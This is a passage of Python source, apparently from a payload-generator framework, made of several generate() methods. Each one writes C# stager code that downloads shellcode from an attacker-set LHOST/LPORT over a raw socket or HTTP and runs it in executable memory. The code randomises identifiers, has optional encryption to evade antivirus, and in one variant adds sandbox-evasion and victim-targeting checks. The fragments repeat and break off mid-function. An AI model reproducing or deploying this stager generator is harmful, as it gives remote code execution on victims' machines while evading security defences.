payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
shellcodeName)
payload_code += " if (%s != null) {\n" % (shellcodeName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, shellcodeName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
shellcodeName, funcAddrName, shellcodeName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
shellcodeName)
payload_code += " if (%s != null) {\n" % (shellcodeName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, shellcodeName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, shellcodeName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, shellcodeName, shellcodeName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
randomName = bypass_helpers.randomString()
num_tabs_required = 0
payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 3
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s);\n" % (injectName, sName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s); }\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# imports and namespace setup
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
payload_code += "static string %s(Random r, int s) {\n" %(randomStringName)
payload_code += "char[] %s = new char[s];\n"%(bufferName)
payload_code += "string %s = \"%s\";\n" %(charsName, chars)
payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
payload_code += "return new string(%s);}\n" %(bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payload_code += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
payload_code += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payload_code += "static byte[] %s(string %s) {\n" %(getDataName,strName)
payload_code += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
payload_code += "byte[] %s = null;\n" %(sName)
payload_code += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
payload_code += "if (%s.Length < 100000) return null;}\n" %(sName)
payload_code += "catch (WebException) {}\n"
payload_code += "return %s;}\n" %(sName)
# code fo the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payload_code += " UInt32 %s = 0;\n" %(threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
payload_code += "%s(%s);}\n" %(injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" %(getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" %(ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" %(sockName)
payload_code += " try { %s.Connect(%s); }\n" %(sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" %(length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" %(sockName, length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" %(lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" %(sName, lengthName)
payload_code += " int %s = 0;\n" %(total_bytesName)
payload_code += " while (%s < %s)\n" %(total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" %(total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" %(handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" %(handleName, sName, sName)
payload_code += " return %s;}\n" %(sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payload_code += " UInt32 %s = 0;\n" %(threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
payload_code += " if (%s != null) {\n" %(sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
sName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
payload_code2, curlyCount = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" %(sName, sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0])
payload_code += " %s(%s); }\n" %(injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
getDataName = helpers.randomString()
injectName = helpers.randomString()
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payload_code += "namespace %s { class %s {\n" % (
helpers.randomString(), helpers.randomString())
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = helpers.randomString()
randomName = helpers.randomString()
curlyCount = 0
payload_code += "static void Main(){\n"
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload code
payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
RandToday)
payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
RandExpire, RandToday,
self.required_options["EXPIRE_PAYLOAD"][0])
payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
RandExpire, RandToday)
# Add a tab for this check
curlyCount += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
self.required_options["HOSTNAME"][0].lower())
# Add a tab for this check
curlyCount += 1
if self.required_options["DOMAIN"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
# Add a tab for this check
curlyCount += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
self.required_options["PROCESSORS"][0])
# Add a tab for this check
curlyCount += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = helpers.randomString()
rand_char_name = helpers.randomString()
payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
rand_user_name)
payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
rand_char_name, rand_user_name)
payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
rand_char_name, self.required_options["USERNAME"][0])
# Add a tab for this check
curlyCount += 1
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s); }\n" % (injectName, sName)
while (curlyCount != 0):
payload_code += '\t' * curlyCount + '}'
curlyCount -= 1
# get 12 random variables for the API imports
r = [helpers.randomString() for x in range(12)]
y = [helpers.randomString() for x in range(17)]
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
